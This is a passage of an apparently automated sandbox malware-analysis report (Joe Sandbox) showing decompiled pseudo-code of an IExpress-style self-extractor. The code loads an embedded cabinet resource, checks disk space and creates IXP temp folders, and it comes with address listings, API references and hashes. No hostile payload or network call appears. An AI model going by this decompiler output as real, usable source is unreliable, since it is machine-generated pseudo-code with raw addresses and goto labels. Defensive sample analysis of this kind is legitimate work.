                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                      							__eflags =  *0xa69a34 & 0x00000008;
                                                                                                                                                                                                      							if(( *0xa69a34 & 0x00000008) == 0) {
                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                      								_t103 =  *0xa69a38; // 0x0
                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0xa689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									 *0xa69124 = 0;
                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t66 = E00A6268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t105 =  *0xa69a38; // 0x0
                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0xa689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0xa69a38;
                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                      						E00A644B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                      					E00A644B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                      					return E00A66CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x00a6597d
                                                                                                                                                                                                      0x00a65988
                                                                                                                                                                                                      0x00a6598f
                                                                                                                                                                                                      0x00a6599a
                                                                                                                                                                                                      0x00a659a6
                                                                                                                                                                                                      0x00a659a8
                                                                                                                                                                                                      0x00a659af
                                                                                                                                                                                                      0x00a659b9
                                                                                                                                                                                                      0x00a659dd
                                                                                                                                                                                                      0x00a659e4
                                                                                                                                                                                                      0x00a659f1
                                                                                                                                                                                                      0x00a659fe
                                                                                                                                                                                                      0x00a65a0b
                                                                                                                                                                                                      0x00a65a13
                                                                                                                                                                                                      0x00a65a19
                                                                                                                                                                                                      0x00a65a1b
                                                                                                                                                                                                      0x00a65ba1
                                                                                                                                                                                                      0x00a65baf
                                                                                                                                                                                                      0x00a65bbd
                                                                                                                                                                                                      0x00a65bd8
                                                                                                                                                                                                      0x00a65bde
                                                                                                                                                                                                      0x00a65be3
                                                                                                                                                                                                      0x00a65bec
                                                                                                                                                                                                      0x00a65bf0
                                                                                                                                                                                                      0x00a65bfc
                                                                                                                                                                                                      0x00a65c02
                                                                                                                                                                                                      0x00a65c02
                                                                                                                                                                                                      0x00a65c02
                                                                                                                                                                                                      0x00a65c04
                                                                                                                                                                                                      0x00a65c04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65c04
                                                                                                                                                                                                      0x00a65a27
                                                                                                                                                                                                      0x00a65a3a
                                                                                                                                                                                                      0x00a65a46
                                                                                                                                                                                                      0x00a65a48
                                                                                                                                                                                                      0x00a65a4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65a64
                                                                                                                                                                                                      0x00a65a6a
                                                                                                                                                                                                      0x00a65a6c
                                                                                                                                                                                                      0x00a65abc
                                                                                                                                                                                                      0x00a65ac2
                                                                                                                                                                                                      0x00a65ac9
                                                                                                                                                                                                      0x00a65aca
                                                                                                                                                                                                      0x00a65aca
                                                                                                                                                                                                      0x00a65acc
                                                                                                                                                                                                      0x00a65acc
                                                                                                                                                                                                      0x00a65acf
                                                                                                                                                                                                      0x00a65ad1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65ad3
                                                                                                                                                                                                      0x00a65ad6
                                                                                                                                                                                                      0x00a65ad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65ada
                                                                                                                                                                                                      0x00a65adc
                                                                                                                                                                                                      0x00a65add
                                                                                                                                                                                                      0x00a65add
                                                                                                                                                                                                      0x00a65ae0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65ae0
                                                                                                                                                                                                      0x00a65ae2
                                                                                                                                                                                                      0x00a65ae4
                                                                                                                                                                                                      0x00a65ae6
                                                                                                                                                                                                      0x00a65ae6
                                                                                                                                                                                                      0x00a65ae6
                                                                                                                                                                                                      0x00a65ae9
                                                                                                                                                                                                      0x00a65aeb
                                                                                                                                                                                                      0x00a65af0
                                                                                                                                                                                                      0x00a65af6
                                                                                                                                                                                                      0x00a65af8
                                                                                                                                                                                                      0x00a65af9
                                                                                                                                                                                                      0x00a65af9
                                                                                                                                                                                                      0x00a65afb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65afd
                                                                                                                                                                                                      0x00a65aff
                                                                                                                                                                                                      0x00a65b00
                                                                                                                                                                                                      0x00a65b03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b03
                                                                                                                                                                                                      0x00a65b05
                                                                                                                                                                                                      0x00a65b08
                                                                                                                                                                                                      0x00a65b20
                                                                                                                                                                                                      0x00a65b27
                                                                                                                                                                                                      0x00a65b52
                                                                                                                                                                                                      0x00a65b52
                                                                                                                                                                                                      0x00a65b5b
                                                                                                                                                                                                      0x00a65b62
                                                                                                                                                                                                      0x00a65b6b
                                                                                                                                                                                                      0x00a65b6d
                                                                                                                                                                                                      0x00a65b76
                                                                                                                                                                                                      0x00a65b7d
                                                                                                                                                                                                      0x00a65b83
                                                                                                                                                                                                      0x00a65b7f
                                                                                                                                                                                                      0x00a65b7f
                                                                                                                                                                                                      0x00a65b7f
                                                                                                                                                                                                      0x00a65b6f
                                                                                                                                                                                                      0x00a65b72
                                                                                                                                                                                                      0x00a65b72
                                                                                                                                                                                                      0x00a65b85
                                                                                                                                                                                                      0x00a65b98
                                                                                                                                                                                                      0x00a65b9e
                                                                                                                                                                                                      0x00a65b87
                                                                                                                                                                                                      0x00a65b8f
                                                                                                                                                                                                      0x00a65b8f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b85
                                                                                                                                                                                                      0x00a65b29
                                                                                                                                                                                                      0x00a65b33
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b35
                                                                                                                                                                                                      0x00a65b48
                                                                                                                                                                                                      0x00a65b4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b4a
                                                                                                                                                                                                      0x00a65b0f
                                                                                                                                                                                                      0x00a65b16
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b16
                                                                                                                                                                                                      0x00a65a7c
                                                                                                                                                                                                      0x00a65a8a
                                                                                                                                                                                                      0x00a65aa5
                                                                                                                                                                                                      0x00a65aab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a659bb
                                                                                                                                                                                                      0x00a659c0
                                                                                                                                                                                                      0x00a659c7
                                                                                                                                                                                                      0x00a659d1
                                                                                                                                                                                                      0x00a659d6
                                                                                                                                                                                                      0x00a65c05
                                                                                                                                                                                                      0x00a65c14
                                                                                                                                                                                                      0x00a65c14

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A659A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A659AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A65A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00A65A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A65A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A65A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A65A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A65AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A65BFC
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                      • Opcode ID: 4e9ab4f2d7bd1ee3ba27921042b7f22401f2d95489d666b9e6f9a7a2f9c3f8e1
                                                                                                                                                                                                      • Instruction ID: aa4074c722f6a3135c5889402529d4aa84b066a968c71517ee72a52a29a7717c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e9ab4f2d7bd1ee3ba27921042b7f22401f2d95489d666b9e6f9a7a2f9c3f8e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE718EB1900608AFEB25DFB0CD89BFB77BCEB58340F1441A9F506D6140EA749E868F60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 a64fe0-a6501a call a6468f FindResourceA LoadResource LockResource 377 a65020-a65027 374->377 378 a65161-a65163 374->378 379 a65057-a6505e call a64efd 377->379 380 a65029-a65051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 a65060-a65077 call a644b9 379->383 384 a6507c-a650b4 379->384 380->379 388 a65107-a6510e 383->388 389 a650b6-a650da 384->389 390 a650e8-a65104 call a644b9 384->390 392 a65110-a65117 FreeResource 388->392 393 a6511d-a6511f 388->393 400 a65106 389->400 401 a650dc 389->401 390->400 392->393 396 a65121-a65127 393->396 397 a6513a-a65141 393->397 396->397 402 a65129-a65135 call a644b9 396->402 398 a65143-a6514a 397->398 399 a6515f 397->399 398->399 403 a6514c-a65159 SendMessageA 398->403 399->378 400->388 405 a650e3-a650e6 401->405 402->397 403->399 405->390 405->400
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E00A64FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0xa69144 = E00A6468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0xa69140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0xa68584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0xa68584, 0x841), 5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E00A64EFD(0, 0);
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E00A64CA0, E00A64CC0, E00A64980, E00A64A50, E00A64AD0, E00A64B60, E00A64BC0, 1, 0xa69148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0xa69148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0xa68584; // 0x0
                                                                                                                                                                                                      						E00A644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0xa61140, 0, E00A64CD0, 0, 0xa69140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0xa68584; // 0x0
                                                                                                                                                                                                      					E00A644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0xa69140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0xa69140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0xa691d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E00A644B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0xa68a38 & 0x00000001) == 0 && ( *0xa69a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0xa68584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      0x00a64fe0
                                                                                                                                                                                                      0x00a64fe6
                                                                                                                                                                                                      0x00a64ff9
                                                                                                                                                                                                      0x00a6500d
                                                                                                                                                                                                      0x00a65013
                                                                                                                                                                                                      0x00a6501a
                                                                                                                                                                                                      0x00a65163
                                                                                                                                                                                                      0x00a65163
                                                                                                                                                                                                      0x00a65020
                                                                                                                                                                                                      0x00a65027
                                                                                                                                                                                                      0x00a65037
                                                                                                                                                                                                      0x00a65051
                                                                                                                                                                                                      0x00a65051
                                                                                                                                                                                                      0x00a65057
                                                                                                                                                                                                      0x00a6505e
                                                                                                                                                                                                      0x00a650a7
                                                                                                                                                                                                      0x00a650ad
                                                                                                                                                                                                      0x00a650b4
                                                                                                                                                                                                      0x00a650e8
                                                                                                                                                                                                      0x00a650e8
                                                                                                                                                                                                      0x00a650ee
                                                                                                                                                                                                      0x00a650ff
                                                                                                                                                                                                      0x00a65104
                                                                                                                                                                                                      0x00a65106
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65106
                                                                                                                                                                                                      0x00a650cd
                                                                                                                                                                                                      0x00a650d3
                                                                                                                                                                                                      0x00a650da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a650dd
                                                                                                                                                                                                      0x00a650e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65060
                                                                                                                                                                                                      0x00a65060
                                                                                                                                                                                                      0x00a65070
                                                                                                                                                                                                      0x00a65075
                                                                                                                                                                                                      0x00a65107
                                                                                                                                                                                                      0x00a65107
                                                                                                                                                                                                      0x00a6510e
                                                                                                                                                                                                      0x00a65111
                                                                                                                                                                                                      0x00a65117
                                                                                                                                                                                                      0x00a65117
                                                                                                                                                                                                      0x00a6511f
                                                                                                                                                                                                      0x00a65121
                                                                                                                                                                                                      0x00a65127
                                                                                                                                                                                                      0x00a65135
                                                                                                                                                                                                      0x00a65135
                                                                                                                                                                                                      0x00a65127
                                                                                                                                                                                                      0x00a65141
                                                                                                                                                                                                      0x00a65159
                                                                                                                                                                                                      0x00a65159
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6515f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A64FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00A65006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00A6500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 00A65030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00A65037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 00A6504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00A65051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A65111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A65159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: c53a7bca9267df7ca5ee83a256e89c1093836ea60da349ce0cc0513c56546254
                                                                                                                                                                                                      • Instruction ID: 5c8c98ed0bc656dd9789833c13d1d5308181729675aae0e82b5a25bfc07b3c0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c53a7bca9267df7ca5ee83a256e89c1093836ea60da349ce0cc0513c56546254
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8431DAB1B807117FD720DBF1AD89F6736BCB71AB55F040614F906A21E1DAF98C428A50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00A653A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00A6171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E00A61680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E00A6658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E00A66CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0xa68a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x00a653ac
                                                                                                                                                                                                      0x00a653b3
                                                                                                                                                                                                      0x00a653b9
                                                                                                                                                                                                      0x00a653bb
                                                                                                                                                                                                      0x00a653bd
                                                                                                                                                                                                      0x00a653bf
                                                                                                                                                                                                      0x00a653d1
                                                                                                                                                                                                      0x00a653d6
                                                                                                                                                                                                      0x00a653e0
                                                                                                                                                                                                      0x00a653e2
                                                                                                                                                                                                      0x00a653f5
                                                                                                                                                                                                      0x00a653fb
                                                                                                                                                                                                      0x00a65402
                                                                                                                                                                                                      0x00a6540b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65413
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65415
                                                                                                                                                                                                      0x00a65416
                                                                                                                                                                                                      0x00a65427
                                                                                                                                                                                                      0x00a6542a
                                                                                                                                                                                                      0x00a6542b
                                                                                                                                                                                                      0x00a65434
                                                                                                                                                                                                      0x00a65434
                                                                                                                                                                                                      0x00a6543a
                                                                                                                                                                                                      0x00a6544c
                                                                                                                                                                                                      0x00a6544c
                                                                                                                                                                                                      0x00a65452
                                                                                                                                                                                                      0x00a6545a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6545e
                                                                                                                                                                                                      0x00a6545f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6171E: _vsnprintf.MSVCRT ref: 00A61750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A653FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
